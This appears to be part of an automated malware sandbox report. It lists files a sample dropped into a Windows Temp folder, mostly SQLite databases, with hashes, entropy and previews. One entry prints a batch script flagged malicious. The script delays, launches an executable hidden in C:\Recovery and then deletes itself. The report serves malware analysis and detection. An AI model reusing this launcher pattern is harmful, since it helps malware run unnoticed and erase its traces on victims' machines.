                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\YTKoz62moQ

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\Z4eWZbIto2

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\Z8XV7UiOsO

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):126976
                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\ZKh2sowp6M

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\ZpsJgraZO3

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\aA1bTd40Eq

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\aEoMlfJ0v2

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):126976
                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\aH5Kwlp99s

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\aWMGkikz2Q.bat

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):169
                                                                                                                                        Entropy (8bit):5.347660996513399
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7LP1QBS2ACIvBktKcKZG1t+kiE2J5xAIqx/0oRH:hCRLuVFOOr+DE7LPuLNIvKOZG1wkn23M
                                                                                                                                        MD5:872E2144ED5414B166684BB45A5A6A84
                                                                                                                                        SHA1:219090DE90550DB570C507C8DEAD69CC2CA14242
                                                                                                                                        SHA-256:550F1BA12C4113E55C3F840BFFCAB11EF197432E7B6932C707DF1DC86275B778
                                                                                                                                        SHA-512:779DDC8129DE95FCFF2B438CEC36A57E551E1B8F74C814285C953F2CEB88139E7E0A96B235A57793D8ACC4966B162BC4A4E203300FC299A3F2AFAA692BDB4092
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\aWMGkikz2Q.bat"

                                                                                                                                        C:\Users\user\AppData\Local\Temp\atcI5wCADG

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\av6uWAN8Ql

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):28672
                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\b8aNRiIJEo

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):5242880
                                                                                                                                        Entropy (8bit):0.037963276276857943
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\bGRiswOjhV

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\bHqC58yYPv

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\bfSPJoJrM9

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\btI10iJ13i

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\buz3btBG0P

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\c9y9Eqcwk2

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):49152
                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\cFvtC7RY53

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\cL2DhqWoG6

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\cQObC7Pdf8

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):28672
                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
